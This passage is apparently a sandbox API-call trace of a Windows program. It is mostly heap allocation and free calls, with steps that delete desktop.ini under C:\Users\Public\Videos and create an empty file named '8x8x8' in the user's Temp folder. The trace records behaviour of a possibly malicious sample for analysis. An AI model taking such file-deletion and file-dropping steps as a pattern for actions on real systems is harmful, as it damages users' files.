dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.457] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e54858 [0269.457] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x22 [0269.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.457] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0x26 [0269.458] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87290 [0269.458] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0269.459] FindNextFileW (in: hFindFile=0xa87290, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0269.459] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0269.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0269.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.459] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e54858 [0269.460] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x22 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.460] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0xffffffff [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.460] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0269.461] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0269.461] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0269.461] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0269.461] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0269.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0269.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0269.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0269.463] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0269.463] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf814 | out: lpNewFilePointer=0x0) returned 1 [0269.463] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0269.463] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf7f4 | out: lpNewFilePointer=0x0) returned 1 [0269.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0269.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0269.463] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf808 | out: lpNewFilePointer=0x0) returned 1 [0269.463] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf81c, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf81c*=0x0, lpOverlapped=0x0) returned 1 [0269.464] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0269.464] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf7f4 | out: lpNewFilePointer=0x0) returned 1 [0269.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0269.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0269.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0269.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0269.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2e54c08, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.465] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e51a60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x8cf818, lpOverlapped=0x0 | out: lpBuffer=0x2e51a60*, lpNumberOfBytesWritten=0x8cf818*=0x0, lpOverlapped=0x0) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.465] CloseHandle (hObject=0x2d0) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.465] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.466] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0269.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0269.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2e54b28, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0269.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.467] GetLastError () returned 0x0 [0269.467] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.468] SetLastError (dwErrCode=0x0) [0269.468] GetLastError () returned 0x0 [0269.472] SetLastError (dwErrCode=0x0) [0269.472] GetLastError () returned 0x0 [0269.472] SetLastError (dwErrCode=0x0) [0269.472] GetLastError () returned 0x0 [0269.472] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) 